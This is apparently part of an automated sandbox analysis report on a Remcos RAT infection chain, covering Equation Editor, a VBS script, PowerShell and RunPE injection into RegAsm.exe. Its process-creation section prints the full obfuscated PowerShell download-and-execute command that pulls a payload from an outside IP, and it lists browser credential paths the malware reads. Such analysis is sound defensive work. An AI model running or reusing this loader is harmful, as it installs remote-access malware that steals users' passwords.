Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3296	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3300	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3300	Thread sleep time: -599564s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3300	Thread sleep time: -4800000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3300	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3348	Thread sleep count: 306 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3348	Thread sleep time: -153000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3352	Thread sleep count: 131 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3352	Thread sleep time: -393000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3428	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3352	Thread sleep count: 8807 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3352	Thread sleep time: -26421000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3348	Thread sleep count: 441 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3348	Thread sleep time: -220500s >= -30000s	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	11_2_00409253
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	11_2_0041C291
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	11_2_0040C34D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	11_2_00409665
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0044E879 FindFirstFileExA,	11_2_0044E879
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	11_2_0040880C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0040783C FindFirstFileW,FindNextFileW,	11_2_0040783C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,	11_2_00419AF5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	11_2_0040BB30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	11_2_0040BD37

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 11_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

11_2_00407C97

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 599564	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

API call chain: ExitProcess graph end node

graph_11-49017

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 11_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

11_2_004349F9

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

11_2_0041CB50

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 6_2_005B2970 mov edx, dword ptr fs:[00000030h]		6_2_005B2970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_004432B5 mov eax, dword ptr fs:[00000030h]		11_2_004432B5

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 11_2_00412077 GetProcessHeap,HeapFree,

11_2_00412077

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00434B47 SetUnhandledExceptionFilter,	11_2_00434B47
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_004349F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_0043BB22
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_00434FDC

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\wscript.exe

Network Connect: 91.92.254.14 80

Jump to behavior

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: powershell.exe PID: 3196, type: MEMORYSTR

.NET source code references suspicious native API functions

Source: 9.2.powershell.exe.2f0000.0.raw.unpack, RunPEE.cs	Reference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref (string)(&name)), ref (string)(&method)), typeof(CreateApi)))
Source: 9.2.powershell.exe.2f0000.0.raw.unpack, RunPEE.cs	Reference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref (string)(&name)), ref (string)(&method)), typeof(CreateApi)))
Source: 9.2.powershell.exe.2f0000.0.raw.unpack, RunPEE.cs	Reference to suspicious API methods: WriteProcessMemory(processInformation.ProcessHandle, num7 + num14, array2, array2.Length, ref bytesWritten)
Source: 9.2.powershell.exe.2f0000.0.raw.unpack, RunPEE.cs	Reference to suspicious API methods: lIuveTP8wwjVYKV1XP(VirtualAllocEx, processInformation.ProcessHandle, 0, length, 12288, 64)
Source: 9.2.powershell.exe.2f0000.0.raw.unpack, RunPEE.cs	Reference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num15 + 8, ref buffer, 4, ref bytesWritten)

Injects a PE file into a foreign processes

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe

11_2_004120F7

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 11_2_00419627 mouse_event,

11_2_00419627

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\goodflowersandgoodreturn.vBS"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('YRClink = SEGhttp://'+'91.92.254.194/'+'imge/new-image_v.jp'+'gSEG; YRCwebClient = New-Object System.Net.WebClient'+'; try { YRCdownloadedData = YRCwebClient.DownloadData(YRClink) } catch { Write-Host SEGFailed To download data from YRClinkSEG -ForegroundColor Red; exi'+'t }; if (YRCdownloadedData -ne YRCnull) { YRCimageText = [System.Text.Encoding]::UTF8.GetString(YR'+'CdownloadedData); YRCstartFlag = SEG<<BASE64_START>>SEG; YRCendFlag = SEG<<BASE64_END>>SEG; YRCstartIndex = YRCimageText.IndexO'+'f(YRCstartFlag); '+'YRCendIndex = YRCimageTe'+'xt.IndexOf(YRCen'+'dFlag); if (YRCstartIndex -ge 0 -and YRCendIndex -gt YRCstartIndex) { YRCstartIndex += YRCstartFlag.Length; YRCbase64Length'+' = YRCendIndex '+'- YRCstartIndex; Y'+'RCbase64Command = YRCimageText.Substring(YRCstartIndex, YRCbase64Length); YRCcommandBytes = [System.Convert]::FromBas'+'e64'+'String(YR'+'Cbas'+'e64Command);'+' YRCloadedAssembly = [System.Reflection.Assembly]::Lo'+'ad(YRCcommandBytes); YRCtype = YRCloade'+'dAssembly.GetType(SEGRunPE.'+'HomeSEG); YRCmethod = '+'YRCtype.GetMethod(SEGVAISEG).Invoke(YRCnull, [object[]] (SEGtxt.SSERW/23099/831.65.232.271//:ptth'+'SEG , SEGdesativadoSEG , SEGdesativadoSEG , SEGdesativadoSEG,SEGRegAsmSEG,SEGSEG)) } }Set Scriptblock YRClink = SEGhttp://91.92.254.194/imge/new'+'-i'+'mage_v.jpgSE'+'G; YRCwebClient = Ne'+'w-Object System.Net.WebClient; try { YRCdownloadedDa'+'ta = YRCwebCli'+'ent.DownloadData(YRCl'+'ink) } catch { Wri'+'te-Host SEGFailed To download data from YRClinkSEG '+'-ForegroundColor Red; exit }; if (YRCdownloadedData -ne YRCnull) { Y'+'RCim'+'ageText = [System.Text.Encoding]::UTF8.GetString(YRCdownl'+'oadedData); YRCstartFlag = SEG<<BASE64_START>>SEG; YRCendFlag = SEG<<BASE64_END>>SEG; YRCstartIndex '+'= YRCimageText.IndexOf(YRCstartFlag); YRCend'+'In'+'dex = YRCimageText.IndexOf(YRCendFlag)'+'; if (YRCstar'+'tIndex -ge 0 -and YRCendIndex -gt YRCstartIndex) { YRCstartIndex += YRCstartFlag.Length; YRCbase64'+'Length = YRCendIndex - YRCstartIndex; YRCbase64Command = YRCimageText.Substr'+'ing(YRCstartIndex, YRCbase64Length); '+'YRCcommandBytes = [System.Convert]::FromBase64String(YRCbase64Command); YRCloadedAssembly = [System.Reflection.Assembly]::Load(YRCcomm'+'andBytes); YRCtype = YRCloadedAssembly.GetType(SEGRunPE'+'.HomeSEG); YRCmethod = YRCtype.GetMethod(SEGVAISEG).Invoke(Y'+'RCnull, [object[]] (SEGtxt.SSERW/23099/831.65.232.271//:ptthSE'+'G , S'+'EGdesativadoSEG , SEGdesativadoSEG , SEGdesativadoSEG,SEGRegAsmSEG,SEGSEG)) } }Set Scriptblock YRClink = SEGhttp://91.92.254.194/imge/new-image_v.jpgSEG; YRCwebClient = New-O'+'bject Sys'+'tem.Net.WebClient; try'+' { Y'+'RCdownloadedData = YRCwebClient.DownloadData(YRClink) } catch { Write-Host'+' SEGFailed To download data from '+'YRClinkSEG -ForegroundColor Red; exit }; if ('+'YRCdownloadedData -ne YRCnull) { YRCimageText '+'= [System.Text.Encoding]::UTF8	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "('yrclink = seghttp://'+'91.92.254.194/'+'imge/new-image_v.jp'+'gseg; yrcwebclient = new-object system.net.webclient'+'; try { yrcdownloadeddata = yrcwebclient.downloaddata(yrclink) } catch { write-host segfailed to download data from yrclinkseg -foregroundcolor red; exi'+'t }; if (yrcdownloadeddata -ne yrcnull) { yrcimagetext = [system.text.encoding]::utf8.getstring(yr'+'cdownloadeddata); yrcstartflag = seg<<base64_start>>seg; yrcendflag = seg<<base64_end>>seg; yrcstartindex = yrcimagetext.indexo'+'f(yrcstartflag); '+'yrcendindex = yrcimagete'+'xt.indexof(yrcen'+'dflag); if (yrcstartindex -ge 0 -and yrcendindex -gt yrcstartindex) { yrcstartindex += yrcstartflag.length; yrcbase64length'+' = yrcendindex '+'- yrcstartindex; y'+'rcbase64command = yrcimagetext.substring(yrcstartindex, yrcbase64length); yrccommandbytes = [system.convert]::frombas'+'e64'+'string(yr'+'cbas'+'e64command);'+' yrcloadedassembly = [system.reflection.assembly]::lo'+'ad(yrccommandbytes); yrctype = yrcloade'+'dassembly.gettype(segrunpe.'+'homeseg); yrcmethod = '+'yrctype.getmethod(segvaiseg).invoke(yrcnull, [object[]] (segtxt.sserw/23099/831.65.232.271//:ptth'+'seg , segdesativadoseg , segdesativadoseg , segdesativadoseg,segregasmseg,segseg)) } }set scriptblock yrclink = seghttp://91.92.254.194/imge/new'+'-i'+'mage_v.jpgse'+'g; yrcwebclient = ne'+'w-object system.net.webclient; try { yrcdownloadedda'+'ta = yrcwebcli'+'ent.downloaddata(yrcl'+'ink) } catch { wri'+'te-host segfailed to download data from yrclinkseg '+'-foregroundcolor red; exit }; if (yrcdownloadeddata -ne yrcnull) { y'+'rcim'+'agetext = [system.text.encoding]::utf8.getstring(yrcdownl'+'oadeddata); yrcstartflag = seg<<base64_start>>seg; yrcendflag = seg<<base64_end>>seg; yrcstartindex '+'= yrcimagetext.indexof(yrcstartflag); yrcend'+'in'+'dex = yrcimagetext.indexof(yrcendflag)'+'; if (yrcstar'+'tindex -ge 0 -and yrcendindex -gt yrcstartindex) { yrcstartindex += yrcstartflag.length; yrcbase64'+'length = yrcendindex - yrcstartindex; yrcbase64command = yrcimagetext.substr'+'ing(yrcstartindex, yrcbase64length); '+'yrccommandbytes = [system.convert]::frombase64string(yrcbase64command); yrcloadedassembly = [system.reflection.assembly]::load(yrccomm'+'andbytes); yrctype = yrcloadedassembly.gettype(segrunpe'+'.homeseg); yrcmethod = yrctype.getmethod(segvaiseg).invoke(y'+'rcnull, [object[]] (segtxt.sserw/23099/831.65.232.271//:ptthse'+'g , s'+'egdesativadoseg , segdesativadoseg , segdesativadoseg,segregasmseg,segseg)) } }set scriptblock yrclink = seghttp://91.92.254.194/imge/new-image_v.jpgseg; yrcwebclient = new-o'+'bject sys'+'tem.net.webclient; try'+' { y'+'rcdownloadeddata = yrcwebclient.downloaddata(yrclink) } catch { write-host'+' segfailed to download data from '+'yrclinkseg -foregroundcolor red; exit }; if ('+'yrcdownloadeddata -ne yrcnull) { yrcimagetext '+'= [system.text.encoding]::utf8
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "('yrclink = seghttp://'+'91.92.254.194/'+'imge/new-image_v.jp'+'gseg; yrcwebclient = new-object system.net.webclient'+'; try { yrcdownloadeddata = yrcwebclient.downloaddata(yrclink) } catch { write-host segfailed to download data from yrclinkseg -foregroundcolor red; exi'+'t }; if (yrcdownloadeddata -ne yrcnull) { yrcimagetext = [system.text.encoding]::utf8.getstring(yr'+'cdownloadeddata); yrcstartflag = seg<<base64_start>>seg; yrcendflag = seg<<base64_end>>seg; yrcstartindex = yrcimagetext.indexo'+'f(yrcstartflag); '+'yrcendindex = yrcimagete'+'xt.indexof(yrcen'+'dflag); if (yrcstartindex -ge 0 -and yrcendindex -gt yrcstartindex) { yrcstartindex += yrcstartflag.length; yrcbase64length'+' = yrcendindex '+'- yrcstartindex; y'+'rcbase64command = yrcimagetext.substring(yrcstartindex, yrcbase64length); yrccommandbytes = [system.convert]::frombas'+'e64'+'string(yr'+'cbas'+'e64command);'+' yrcloadedassembly = [system.reflection.assembly]::lo'+'ad(yrccommandbytes); yrctype = yrcloade'+'dassembly.gettype(segrunpe.'+'homeseg); yrcmethod = '+'yrctype.getmethod(segvaiseg).invoke(yrcnull, [object[]] (segtxt.sserw/23099/831.65.232.271//:ptth'+'seg , segdesativadoseg , segdesativadoseg , segdesativadoseg,segregasmseg,segseg)) } }set scriptblock yrclink = seghttp://91.92.254.194/imge/new'+'-i'+'mage_v.jpgse'+'g; yrcwebclient = ne'+'w-object system.net.webclient; try { yrcdownloadedda'+'ta = yrcwebcli'+'ent.downloaddata(yrcl'+'ink) } catch { wri'+'te-host segfailed to download data from yrclinkseg '+'-foregroundcolor red; exit }; if (yrcdownloadeddata -ne yrcnull) { y'+'rcim'+'agetext = [system.text.encoding]::utf8.getstring(yrcdownl'+'oadeddata); yrcstartflag = seg<<base64_start>>seg; yrcendflag = seg<<base64_end>>seg; yrcstartindex '+'= yrcimagetext.indexof(yrcstartflag); yrcend'+'in'+'dex = yrcimagetext.indexof(yrcendflag)'+'; if (yrcstar'+'tindex -ge 0 -and yrcendindex -gt yrcstartindex) { yrcstartindex += yrcstartflag.length; yrcbase64'+'length = yrcendindex - yrcstartindex; yrcbase64command = yrcimagetext.substr'+'ing(yrcstartindex, yrcbase64length); '+'yrccommandbytes = [system.convert]::frombase64string(yrcbase64command); yrcloadedassembly = [system.reflection.assembly]::load(yrccomm'+'andbytes); yrctype = yrcloadedassembly.gettype(segrunpe'+'.homeseg); yrcmethod = yrctype.getmethod(segvaiseg).invoke(y'+'rcnull, [object[]] (segtxt.sserw/23099/831.65.232.271//:ptthse'+'g , s'+'egdesativadoseg , segdesativadoseg , segdesativadoseg,segregasmseg,segseg)) } }set scriptblock yrclink = seghttp://91.92.254.194/imge/new-image_v.jpgseg; yrcwebclient = new-o'+'bject sys'+'tem.net.webclient; try'+' { y'+'rcdownloadeddata = yrcwebclient.downloaddata(yrclink) } catch { write-host'+' segfailed to download data from '+'yrclinkseg -foregroundcolor red; exit }; if ('+'yrcdownloadeddata -ne yrcnull) { yrcimagetext '+'= [system.text.encoding]::utf8			Jump to behavior

Source: RegAsm.exe, 0000000B.00000002.1043297372.000000000079B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerPP\
Source: RegAsm.exe, 0000000B.00000002.1043182519.0000000000731000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \|Program Manager\|
Source: RegAsm.exe, 0000000B.00000002.1043182519.0000000000731000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager Swift tract-20240506_120 [Compatibility Mode]985116p
Source: RegAsm.exe, 0000000B.00000002.1043182519.0000000000731000.00000004.00000020.00020000.00000000.sdmp, logs.dat.11.dr	Binary or memory string: [Program Manager]

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 11_2_00434C52 cpuid

11_2_00434C52

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	11_2_00452036
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	11_2_004520C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	11_2_00452313
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	11_2_00448404
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	11_2_0045243C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	11_2_00452543
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	11_2_00452610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoA,	11_2_0040F8D1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	11_2_004488ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: IsValidCodePage,GetLocaleInfoW,	11_2_00451CD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	11_2_00451F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	11_2_00451F9B

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 11_2_00448957 GetSystemTimeAsFileTime,

11_2_00448957

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 11_2_0041B60D GetUserNameW,

11_2_0041B60D

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 11_2_00449190 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

11_2_00449190

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: 9.2.powershell.exe.39e5af8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.powershell.exe.39e5af8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.1043182519.0000000000731000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.454028301.0000000003559000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.454028301.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 3196, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3332, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\not\logs.dat, type: DROPPED

Contains functionality to steal Chrome passwords or cookies

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data

11_2_0040BA12

Contains functionality to steal Firefox passwords or cookies

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\		11_2_0040BB30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: \key3.db		11_2_0040BB30

Remote Access Functionality

Detected Remcos RAT

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Mutex created: \Sessions\1\BaseNamedObjects\Rmc-Y7DJPP

Jump to behavior

Yara detected Remcos RAT

Source: Yara match	File source: 9.2.powershell.exe.39e5af8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.powershell.exe.39e5af8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.1043182519.0000000000731000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.454028301.0000000003559000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.454028301.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 3196, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3332, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\not\logs.dat, type: DROPPED

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: cmd.exe

11_2_0040569A

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	221 Scripting	Valid Accounts	11 Native API	221 Scripting	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	1 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	23 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	43 Exploitation for Client Execution	1 DLL Side-Loading	1 Bypass User Account Control	21 Obfuscated Files or Information	211 Input Capture	1 Account Discovery	Remote Desktop Protocol	211 Input Capture	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	221 Command and Scripting Interpreter	1 Windows Service	1 Access Token Manipulation	1 Software Packing	2 Credentials In Files	1 System Service Discovery	SMB/Windows Admin Shares	3 Clipboard Data	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 Service Execution	1 Browser Extensions	1 Windows Service	1 DLL Side-Loading	NTDS	3 File and Directory Discovery	Distributed Component Object Model	Input Capture	1 Remote Access Software	Traffic Duplication	Data Destruction
